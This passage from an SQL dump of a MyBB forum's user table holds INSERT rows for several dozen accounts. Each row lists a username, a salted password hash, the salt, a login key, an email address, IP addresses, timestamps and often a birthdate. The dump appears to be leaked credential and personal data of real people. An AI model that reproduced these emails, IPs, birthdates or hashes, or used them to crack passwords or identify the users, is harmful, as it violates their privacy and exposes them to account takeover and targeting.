'0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('159', 'Victori0us', 'ea0b80c55d84e24f3bb9b985ec87b2bf', 'WRbPCyvb', 'FIwKbEu6jHtjO3sMo9MtTLaMC2JwTh5uaffEVuTW8adEAmoJoR', 'Narrative@live.com', '1', '', '', '', '2', '', '0', '', '1346419210', '1347329499', '1346596694', '1346419973', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '65.27.123.23', '72.229.164.105', '1092320023', '1223009385', '', '2566', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('160', 'Jacob', 'ec9b22bce5c1bd7084386e1830f747e1', 'Xq6dAB2i', 'DAGOxvptylYepwEloKGRRnKzNVkwNkzpehVm4mbl2kGgkG2CrH', 'jakubczachor418@gmail.com', '18', '', '', '', '2', '', '0', '', '1346420403', '1352326739', '1352239722', '1352238599', '', '0', '', '', '', '', 'all', '[img]http://i.imgur.com/GgQJx.jpg[/img]', '0', '0', '0', '0', '1', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '142.255.31.241', '142.255.31.241', '-1895882767', '-1895882767', '', '28173', '1', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('161', 'crankynurse', '674c4a13b027b32185a62cda8e65b43f', 'HUfTzZ7F', 'GrjZQqtCvh1m37mKm4g22tIP7usDWkWDaISTYixh8xDGIcozq9', 'hugheschristian25@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346434237', '1346781406', '1346436558', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '164.58.144.196', '164.58.144.196', '-1539665724', '-1539665724', '', '994', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('162', 'Dingus', 'fd84bd600494f353bb3538b375d2d5b1', '3we1cDwE', 'QJeS2fZAnWCnjYcjvkKPqvQKy19KPOrhoHXRktwXc1svtA1LlP', 'dinguss024@gmail.com', '3', '', '', '', '2', '', '0', '', '1346458736', '1346704796', '1346650739', '1346459591', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '209.188.74.94', '209.188.74.94', '-776189346', '-776189346', '', '4120', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('165', 'sp454645', '9e13285b0059b799295b9af829da564c', 'zHh5apUE', 'Cl9ck2zVinLtjfSltFiv8FUNGOSPXQ76gBluevMJVQ68GGCumK', 'stevo6_p@hotmail.com', '0', '', '', '', '2', '', '0', '', '1346550380', '1346552886', '1346551202', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '10', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '123.243.70.203', '209.73.132.221', '2079540939', '-783711011', '', '1502', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('164', 'otaq', 'cf6cfc1d3e5a1f475cd56d076b4430c3', 'bdGT2S7C', 'IgfODpmSBQJfOOF5tWkhD7UHfYGHguJ5I2gBxUhwm3TqDDo35K', 'adpe28@gmail.com', '0', '', '', '', '2', '', '0', '', '1346530216', '1346530403', '1346530216', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '181.1.202.219', '181.1.202.219', '-1258173733', '-1258173733', '', '187', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('167', '2wired', 'aaa16ecfa4b6242b7368582860109368', '48QzqrKm', 'luhCYfeklezWdWbNF97mBvttsCuBudztUAegnDPMi8Jl28MSY2', 'jbaylor@pfh.ie', '0', '', '', '', '2', '', '0', '', '1346689090', '1346689380', '1346689090', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '2', '0', '1', '0', '0', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '83.147.183.30', '83.147.183.30', '1402189598', '1402189598', '', '290', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('166', '2112', '462606c90cb2cdf990f4c517ffdb308c', '9C1RlIQl', 'LVZrxqsXsQm169Zx34CMLOfhlErfJZ4bcIDJcTjWz149yKVb1b', 'Nathanielruizz@hotmail.com', '12', './uploads/avatars/avatar_166.gif?dateline=1346717343', '90|68', 'upload', '2', '', '0', 'Soliloquy', '1346646892', '1347422350', '1347318440', '1347114854', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-6', '1', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '10', '108.220.98.220', '108.220.98.220', '1826382556', '1826382556', '', '19445', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('168', 'indichi', 'b6f0d4d0b13e224d4e94d15fc2923345', 'TJGF4Yzs', 'BH4FyAyUVHn68S23eqXCbiV9hSwuREVwWu1beiu5vKDGYsJBVz', 'indigo_child2012@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346757136', '1346853572', '1346834740', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '178.239.48.14', '178.239.48.14', '-1292947442', '-1292947442', '', '2201', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('169', 'hackkanji12', '0b1921537bf281c3061e52c2c0930b6c', 'vP4x81Ig', 'i2TJAic6x5dVdfvXmr1rOaRVjiq3jFMC61wfJbNWkIEP5KPwXi', 'hackkanji@yahoo.com', '0', '', '', '', '2', '', '0', '', '1346759648', '1346759648', '1346759648', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '41.218.228.22', '', '702211094', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('171', 'W33D', '154cde4b9f8616e38a10194cec0f69e6', 'eucYfit9', 'WZs7bnK2gjjcUyFQ2dx4MHUa7jvOO3ysvwpZf1eVr6nGawFyn9', 'graalwanabe123@hotmail.com', '4', 'http://www.ubers.org/uploads/avatars/avatar_51071.gif?dateline=1345030849?dateline=1346767654', '85|85', 'remote', '2', '', '0', '', '1346767282', '1346873495', '1346806276', '1346806276', '', '0', '', '', '', '', 'all', '[align=center][img]http://img27.imageshack.us/img27/2654/lhfb.png[/img][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.68.224.95', '67.68.224.95', '1128587359', '1128587359', '', '2990', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('172', 'MistaCode', '72028da06203ad0e221f802a1d836261', 'aiPItlq9', 'rkBG8WKLht4Pfkmc7QfXXOcqjlMHfLzEq4ISojezZzEiojEkhl', 'korhaleksi@gmail.com', '32', '', '', '', '2', '', '0', '', '1346774332', '1352143918', '1350220357', '1350060722', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '2', '46.165.208.13', '88.193.83.195', '782618637', '1489064899', '', '17345', '1', '4', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '12'); INSERT INTO mybb_users VALUES('173', 'Dezinated', 'a5751bf5315945dfbc8b5427694a7f55', 'GVRgsaJ7', 'ourcnhOCk18zcIIhC1wBhYnJwxyPb4qA7B75kUBc5PoJH9Mild', 'dezinated@gmail.com', '0', '', '', '', '2', '', '0', '', '1346803206', '1346803209', '1346803206', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '99.228.31.50', '99.228.31.50', '1675894578', '1675894578', '', '3', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('174', 'a-monetmir', '32ecdc8839a43b01be15281799b17daf', '1x9J4qHp', '8QFeFiE38XqYHX3LeDUBGGS1N7ox1yjr45JgvHhEgKUKchdbOC', 'a.nedmir@gmail.com', '0', '', '', '', '2', '', '0', '', '1346835586', '1346838524', '1346835586', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '65.49.68.185', '65.49.68.185', '1093747897', '1093747897', 'english', '605', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('234', 'SamuelNguyen', 'ddfe4ea0aae3aea9d52c6b3b0d15dc04', 'Czo33lgv', 'eNrlBc8nzkRINyqlkLi73pWzc99jG6q4w1Aqn7iy6UBoXWdCi4', 'samuelnnguyen@hotmail.com', '2', '', '', '', '2', '', '0', '', '1349655280', '1349663649', '1349659674', '1349655945', '', '0', '', '', '', '5-4-1980', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '95.140.125.125', '174.60.173.69', '1603042685', '-1371755195', '', '956', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('177', 'morbidx', '13080bd7287896dd80653a786fd3f43f', 'lXPzfjbE', 'Kfl5mDHQFpg1yWZ46V8uWOojTrOdPvr8n7PHINDhlVJP2tBZrZ', 'domesticatepronged@noclickemail.com', '0', '', '', '', '7', '', '0', '', '1346873134', '1346879433', '1346879433', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '217.114.211.243', '95.141.28.55', '-646786061', '1603083319', '', '3628', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('176', 'someone4ever190', '4969a1388c2a8c35933cb76f7b0f867a', 'TNbGVRf8', '9bYlMZy4tPaVff5Qnuxzox9roMTQVUUjKYNjKj39lmmzK9ndzQ', 'someone4ever190@yahoo.com', '0', '', '', '', '7', '', '0', '', '1346863254', '1346863254', '1346863254', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '184.171.165.71', '', '-1196710585', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('178', 'The Host', 'bc6da019ba74b0cfb03d44a6aa53b100', 'fgitOVy5', 'yfnWbnFrf432PUSa6NhgozNKzh8XCOWQYLM2fUI6QV4N4PX2TR', 'linkworld@live.com', '1', '', '', '', '14', '', '0', '', '1346965873', '1346968848', '1346965873', '1346966395', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '94.13.132.145', '94.13.132.145', '1577944209', '1577944209', '', '2975', '1', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('179', 'ryuzaki', '9f73ebf3331d0f0edbd6585f36020eab', '9eukDJeu', 'uEMd38J23TZcsIKWAsDkrDfOKMY3BL6Wnok8NcPlIRkkJOZEk5', 'alexito_p1@live.com.mx', '0', '', '', '', '7', '', '0', '', '1346983817', '1346983817', '1346983817', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '189.221.180.145', '', '-1109543791', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('180', 'ThatUselessMan', '0a6ef1fe118e919f969efbf30f04c9d9', 'Xf45YXtA', '6w72OSQ3LVuv9TmZjJDQXBsxj2LSQep72mNkEN9iy3hEXboUrM', 'thatuselessman@gmail.com', '0', '', '', '', '2', '', '0', '', '1347123373', '1347123679', '1347123373', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '77.86.33.102', '77.86.33.102', '1297490278', '1297490278', '', '306', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('181', 'Sotark', '2738617f0d81cf8b4be6606419f91b11', 'fRtMlhq9', 'QNArsh7vQp8QF5P3eZHsLr5cEsJXUmOCC7cgiSuVjGqTZ13XJv', 'sotarkhf@hotmail.com', '0', '', '', '', '2', '', '0', '', '1347135400', '1347135400', '1347135400', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-10', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '1', '0', '0', '70.95.105.70', '', '1180657990', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('182', 'jrmn', 'fa64bd7f75891af04a039e777202c52e', 'QCBw4mOt', 'aoiiC2B5WIrBDGP6MuHYhqgZDSxc2k4xFXETZ5uIQJa9KWZ65k', 'jarkolatal@centrum.sk', '0', '', '', '', '2', '', '0', '', '1347177832', '1348909682', '1347218452', '0', '', '0', '', '', '', '14-12-1980', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '0', '87.197.102.229', '195.91.108.175', '1472554725', '-1017418577', '', '1424', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('183', 'toxicsn0w', '210fe9bcb56dc81ba39c5e035b083c74', 'iKxNKQE5', 'wWGMwOA1RHr3kGxS4EWiqCk3i5fs9MsiOxb1DJlHVuUtwuMHKQ', 'haroon.bc@gmail.com', '1', '', '', '', '2', '', '0', '', '1347362580', '1347362808', '1347362580', '1347362726', '', '0', '', '', '', '1-1-1988', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '69.119.94.188', '69.119.94.188', '1165450940', '1165450940', '', '228', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('184', 'Homeless', '38255f6d048e42d591507efadfd1bc3f', 'nNyJeoAh', 'n8fChqoeYFQ4sOKaJg3IKW7U4npdYcUCSDpGAPoz3cNjaXNPeu', 'zieglerandrew@ymail.com', '1', '', '', '', '2', '', '0', '', '1347595690', '1347821473', '1347657126', '1347595892', '', '0', '', '', '', '24-2-1997', 'all', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '75.48.249.244', '99.164.138.156', '1261500916', '1671727772', '', '494', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('187', 'hacking is stupid', 'a87663299a562c13cbe5ff6244604f55', '4UC1t2k2', '5Sm8pzS34eUONJUdokH5cQGcDBqJVXzmYfeWUpCZd4Uoiug2TP', 'igotleswag@hotmail.com', '0', '', '', '', '2', '', '0', '', '1347655320', '1347655471', '1347655320', '0', '', '0', '', '', '', '8-8-1993', 'all', '', '0', '0', '0', '0', '0', '0', '0', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '75.34.59.228', '75.34.59.228', '1260534756', '1260534756', '', '151', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('188', 'Lonnie', '42ceee0ff70cb04cf3c379100a0aa04e', 'Aa3I36ZS', 'ySrHTSP1QwiJr77bv6lBkuXjrUNpMITYwDz9puS4FwEYEi4xSX', 'gekijyuken@gmail.com', '6', './uploads/avatars/avatar_188.jpg?dateline=1347677104', '120|125', 'upload', '2', '', '0', '', '1347665854', '1347928962', '1347924037', '1347924028', '', '0', '', '', '', '2-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '68.83.86.251', '68.83.86.251', '1146312443', '1146312443', '', '3733', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('185', 'Vohke', '5b868101b4e0e833db2288af11a60f1e', 'cIQ9xFCS', 'm54ctSPDyCdGyglGEMM2NMoyXb8YgkMQ8PSnNAm7PDqgpQ7dIY', 'diegonick1@live.com', '0', '', '', '', '2', '', '0', '', '1347652614', '1347652614', '1347652614', '0', '', '0', '', '', '', '7-4-1990', 'all', '', '0', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '190.166.138.12', '', '-1096381940', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('189', 'venom19', '369ca7c15d35109febd4268a944edeb6', 'lE86Desn', 'j1gHiLJZWVUgMkLc7FDBnaqMMzrpRcaKuxCcO9AUwP9xlhfoYo', 'villa.jordi@gmail.com', '0', '', '', '', '2', '', '0', '', '1347739896', '1347742516', '1347739896', '0', '', '0', '', '', '', '31-8-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '95.19.100.107', '95.19.100.107', '1595106411', '1595106411', '', '2649', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('190', 'Tropical', '68dc906683535f7397d38c433eb4de39', 'cHjjSVm4', 'DZlhjumWDmtIPPjxEoEVPFzjsdTW9HdgB3tkLSlBoECa5D2AIf', 'linda_rulz@live.ca', '0', '', '', '', '2', '', '0', '', '1347751435', '1347751457', '1347751457', '0', '', '0', '', '', '', '29-3-1993', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '50.101.171.181', '50.101.171.181', '845523893', '845523893', '', '22', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '2', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('191', 'whodeypimp', 'df056e2e2cae67916438dee57fe26302', 'Wj4jHbAO', 'cNsqbHW6LA7FqvHIcl1QIi3bFTACPMDZ8HBorWKsnlM6WCo6TH', 'rayboy1995@aol.com', '0', '', '', '', '2', '', '0', '', '1347757658', '1347770311', '1347760705', '0', '', '0', '', '', '', '18-1-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '24.190.244.64', '24.190.244.64', '415167552', '415167552', '', '1785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('192', 'LiLViETGRL', '875c902cdfbd98ced56b7473941525d1', 'bE5ukjB1', '5BPKw4cehaqTNUCANVVDYTLO2EspJNJ5IRbRSNaC89I2fxjLfo', 'lilvietgirl4o8@yahoo.com', '0', '', '', '', '2', '', '0', '', '1347875268', '1347875371', '1347875268', '0', '', '0', '', '', '', '31-8-1988', 'all', '', '1', '1', '0', '1', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-7', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '24.6.164.63', '24.6.164.63', '403088447', '403088447', 'english', '103', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('193', 'Titan', '316455295c68c4c8f52d2c2cc3a215a0', 'l61AHV7G', 'FMGXGkCGHHykKwtkaGECDoE3NB8hgR6abjL5qjwk3lUmxMICfQ', 'teamgbz@gmail.com', '0', '', '', '', '2', '', '0', '', '1347894560', '1347894850', '1347894560', '0', '', '0', '', '', '', '9-1-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '117.216.90.113', '117.216.90.113', '1977113201', '1977113201', '', '290', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('194', 'Slender Man', '04339cdad974fda9ff373f862e748b2c', '7vnI9PT8', 'ELanQfSoed6jiZYeiQ4cO33VHxVsu2aiUiAb7mvkW7zkUePvBM', 'thesyndicate2012@yahoo.com', '21', './uploads/avatars/avatar_194.jpg?dateline=1348112330', '113|150', 'upload', '2', '17', '0', '', '1348092775', '1351817794', '1351229431', '1349828988', '', '0', '', '', '', '28-11-1990', 'all', '[align=center][i]\"Music is like pie, once you get a taste you can\'t get enough\" - Me. :hehe:[/i][/align]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '10', '99.108.180.49', '99.42.159.191', '1668068401', '1663737791', '', '14841', '1', '3', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '4'); INSERT INTO mybb_users VALUES('195', 'itsyoursite', '357f6aa5e6d33eaad2e6e34f7dac25b1', 'N6cSmSwq', 'lAtzaTfvDpB9oEklF3qFkzWp9YBV9M5UA4hWkOUqjqvc1UtoEc', 'tonyjabbour007@gmail.com', '0', '', '', '', '2', '', '0', '', '1348142449', '1348489757', '1348142868', '0', '', '0', '', '', '', '3-5-1993', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '141.105.95.20', '141.105.95.20', '-1922474220', '-1922474220', '', '705', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('196', '-CHLS-', 'a5a49854249309cf2f4ae64f10a77ed6', '8leHpVSb', 'bq6IkBRwFcLF6QPcMg2B47UKnCNWPlbNiOUiZhFI1JAxeo7u4C', 'royaldowns519@gmail.com', '0', '', '', '', '2', '', '0', '', '1348508133', '1349645700', '1348561844', '0', '', '0', '', '', '', '5-8-1988', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '1', '0', '0', '95.140.125.83', '95.140.125.83', '1603042643', '1603042643', '', '1307', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('197', 'sjox', 'b5cfb06e317d3a8223bd594d2dba3a71', '5vSDgMFW', 'C8BWyL2epquW74n45i1BNOVmnzyJz1YG5ViVLEozBpHbZLcuVp', 'sjorsuden@gmail.com', '0', '', '', '', '2', '', '0', '', '1348522388', '1348522469', '1348522388', '0', '', '0', '', '', '', '3-6-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '84.31.88.238', '84.31.88.238', '1411340526', '1411340526', '', '81', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('198', 'Mr407', 'ad08e8d7ad93899fbbb2ef8d09fa3097', 'TnoOwqv6', '6GY4bV5S4dxUWf4z2pM4cb8Gb6pEcknpR4nDVqvYGVaAmQrbXb', 'cokeisgod@yahoo.com', '0', '', '', '', '2', '', '0', '', '1348535413', '1351734172', '1351668656', '1351668270', '', '0', '', '', '', '4-8-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '68.204.185.63', '184.90.113.116', '1154267455', '-1202032268', '', '1328', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('199', 'Anonymous™', '91c4575bd15a478caa4f7324c73b23b0', 'bZ66WU4s', 